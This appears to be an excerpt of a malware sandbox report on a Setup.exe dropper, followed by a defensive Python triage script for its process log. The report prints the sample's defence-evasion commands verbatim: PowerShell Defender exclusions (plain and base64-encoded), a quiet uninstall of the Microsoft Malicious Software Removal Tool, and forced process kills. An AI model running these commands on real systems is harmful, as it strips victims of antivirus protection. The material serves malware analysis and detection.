Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0B3710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE0C0B3710
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE1025A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE1025A0C0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE1025AB08 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE1025AB08
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10306554 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE10306554
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10305FB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE10305FB0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE11520AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE11520AA8
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE12E12BCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE12E12BCC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE12E130AC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE12E130AC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE130C52F0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE130C4D20
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCB1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF702BCB1B8
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BBC88C SetUnhandledExceptionFilter, 18_2_00007FF702BBC88C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BBC6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF702BBC6AC
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BBBE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF702BBBE20
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE014C6554 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE014C6554
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE014C5FB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE014C5FB0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0B3CE0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE0C0B3CE0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0B3710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE0C0B3710
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE101E0AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE101E0AA8
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10303398 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE10303398
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10302DD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE10302DD0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11501AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE11501AC0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE115014F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE115014F0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE1151AB08 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE1151AB08
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE1151A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE1151A0C0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE120C52F0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE120C4D20
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE12E12BCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE12E12BCC
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE12E130AC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE12E130AC
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: 38_2_00007FF7A81D1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit, 38_2_00007FF7A81D1160
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: 43_2_00007FF7ECBC1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit, 43_2_00007FF7ECBC1160
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE01216554 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE01216554
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE01215FB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE01215FB0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE10260AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE10260AA8
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE110F52F0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE110F4D20
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE130C1AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE130C1AC0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE130C14F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE130C14F0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13203398 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE13203398
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13202DD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE13202DD0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13233710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE13233710
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13233CE0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE13233CE0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1325A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE1325A0C0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1325AB08 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE1325AB08
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE148E2BCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE148E2BCC
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE148E30AC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE148E30AC
Source: C:\Windows\System32\conhost.exe Code function: 52_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 52_2_0000000140001160
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E173398 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE0E173398
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E172DD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE0E172DD0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB33710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE0EB33710
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB33CE0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE0EB33CE0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB55FB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE0EB55FB0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB56554 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE0EB56554
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE110752F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE110752F0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11074D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE11074D20
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BB1AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE11BB1AC0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BB14F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE11BB14F0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BCAB08 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE11BCAB08
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BCA0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE11BCA0C0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11EB0AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE11EB0AA8
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE1A4730AC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE1A4730AC
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE1A472BCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE1A472BCC
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\Setup.exe Process created: Base64 decoded <#gqr#>Add-MpPreference <#sbm#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hzb#> -Force <#djn#>
Source: C:\Users\user\Desktop\Setup.exe Process created: Base64 decoded <#gqr#>Add-MpPreference <#sbm#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hzb#> -Force <#djn#>
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Thread register set: target process: 7836
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Thread register set: target process: 7904
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA="
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\hamburger.exe "C:\Users\user\AppData\Local\Temp\hamburger.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\mergedALL.exe "C:\Users\user\AppData\Local\Temp\mergedALL.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\etc test.exe "C:\Users\user\AppData\Local\Temp\etc test.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\fix.exe "C:\Users\user\AppData\Local\Temp\fix.exe"
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"
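The encoded PowerShell entry, the wusa call and the taskkill/relaunch pair above are the lines a responder acts on first. The Python below is an added example, not part of this report and not code belonging to the sample: it parses the report's "Process created" entries, decodes the -EncodedCommand blob the way powershell.exe does (base64 over UTF-16LE, not UTF-8), strips the <# ... #> comment padding the dropper uses to split the cmdlet name across tokens, and applies a handful of rules to the effective command line. The entry regex, the rule names and the severities are this example's own choices; KB890830 is the Windows Malicious Software Removal Tool; the sample entries are copied from the lines above.

```python
"""Triage of Joe Sandbox "Process created" entries (added example, not part of
the report and not code from the sample).  Entry regex, rule names and
severities are this example's own; sample entries are copied from the page."""
import base64
import binascii
import re

# Entries copied verbatim from the report section above.
SAMPLE_ENTRIES = [
    r'Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA="',
    r'Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\hamburger.exe "C:\Users\user\AppData\Local\Temp\hamburger.exe"',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart',
    r'Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe',
]

# "Source: <parent> Process created: <image> <command line>"; the image is cut
# at the first ".exe" followed by a space, which also copes with "etc test.exe".
ENTRY_RE = re.compile(r"Source: (.+?) Process created: (.+?\.exe) (.*)$", re.I)
# -EncodedCommand and the abbreviations powershell.exe accepts for it.
ENC_RE = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+"?([A-Za-z0-9+/=]{8,})', re.I)
COMMENT_RE = re.compile(r"<#.*?#>", re.S)


def parse_entry(line):
    """Split one report entry into (parent, child image, child command line)."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Process created entry: {line!r}")
    return m.group(1), m.group(2), m.group(3)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if there is none or
    the blob is not valid base64.  errors='replace' keeps the function total:
    base64 is case-sensitive, so a copy a log pipeline has lowercased decodes
    to replacement characters rather than to the script."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1))
    except binascii.Error:
        return None
    return raw.decode("utf-16-le", errors="replace")


def deobfuscate(script):
    """Remove block comments used as token padding and collapse whitespace."""
    return " ".join(COMMENT_RE.sub("", script).split())


def triage(image, cmdline):
    """Return a list of (severity, finding) tuples for one child process."""
    findings = []
    script = decode_encoded_command(cmdline)
    effective = deobfuscate(script) if script is not None else cmdline

    # Rule 1: Defender exclusions.  $env:SystemDrive (or a bare drive root)
    # excludes the whole volume, which amounts to switching Defender off.
    m = re.search(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+(\S+)",
                  effective, re.I)
    if m:
        whole_volume = re.search(r"SystemDrive|(?<![\w\\])[A-Za-z]:\\?(?=[\"',)]|$)",
                                 m.group(2), re.I)
        findings.append(("critical" if whole_volume else "high",
                         f"Defender Exclusion{m.group(1)} added: {m.group(2)}"))
    if script is not None:
        findings.append(("medium", "encoded PowerShell command line"))

    # Rule 2: KB890830 is the Malicious Software Removal Tool; removing it
    # quietly is defence evasion, not maintenance.
    if re.search(r"\bwusa\b.*?/uninstall\b.*?/kb:890830\b", effective, re.I):
        findings.append(("high", "uninstalls MSRT (KB890830) via wusa"))

    # Rule 3: image started straight from the profile root with no subfolder,
    # the "drops PE files to the user root directory" behaviour of the report.
    if re.match(r"[A-Za-z]:\\Users\\[^\\]+\\[^\\]+\.exe$", image, re.I):
        findings.append(("medium", "executable launched from user profile root"))

    # Rule 4: forced kill by image name, here the step before the same payload
    # is relaunched from its new path.
    m = re.search(r"\btaskkill\b.*?/f\b.*?/im\s+\"?([^\s\"]+)", effective, re.I)
    if m:
        findings.append(("low", f"forced kill of {m.group(1)}"))
    return findings


def triage_report(lines):
    """Return [(child image, findings), ...] for a list of report entries."""
    out = []
    for line in lines:
        _parent, image, cmdline = parse_entry(line)
        out.append((image, triage(image, cmdline)))
    return out


if __name__ == "__main__":
    for image, found in triage_report(SAMPLE_ENTRIES):
        print(image)
        for severity, text in found:
            print(f"  [{severity}] {text}")
```

Run as a script it prints one block per entry. Two points worth keeping in mind when reusing the rules: base64 is case-sensitive, so a command line that a sandbox or SIEM has normalised to lower case no longer decodes and the Defender rule will miss it, which is why the function returns a string of replacement characters rather than raising; and an exclusion of $env:SystemDrive covers every file on the system volume, so it is scored above a profile-only exclusion. On a suspected host, confirm the finding with Get-MpPreference | Select-Object -ExpandProperty ExclusionPath before remediating.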
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F051A420 cpuid 6_2_00007FF7F051A420
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
